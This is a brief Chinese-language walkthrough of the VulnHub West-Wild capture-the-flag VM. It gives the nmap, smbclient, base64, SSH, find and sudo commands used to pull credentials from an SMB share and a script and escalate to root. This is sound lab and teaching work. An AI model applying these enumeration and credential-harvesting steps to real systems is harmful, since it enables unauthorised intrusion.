本周实践的是vulnhub的West-Wild镜像,
下载地址,https://download.vulnhub.com/westwild/West-Wild-v1.1.ova,
用virtualbox导入成功,
不用做地址扫描,console上直接看到了dhcp到的地址192.168.0.187,
做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.187,
发现靶机有ssh、http以及samba服务,
查看samba共享,smbclient -L \\192.168.0.187,
获取到wave,
继续访问wave,smbclient \\192.168.0.187/wave,
查看到文件,下载FLAG1.txt,获取到base64编码内容,
解码,echo 'RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K' | base64 -d,
获取到用户名密码,wavex/door+open,
登录靶机,ssh [email protected],
查找root权限可写路径,find / -writable -type d 2>/dev/null,
获取到/usr/share/av/westsidesecret,
进入目录,cd /usr/share/av/westsidesecret,
查看到ififoregt.sh,内容是bash脚本,
里面有另一个用户名密码,aveng/kaizen+80,
切换账户,su aveng,sudo -l确认有完全的sudo权限,
切到root,sudo su root,id确认没问题,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之West-Wild的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论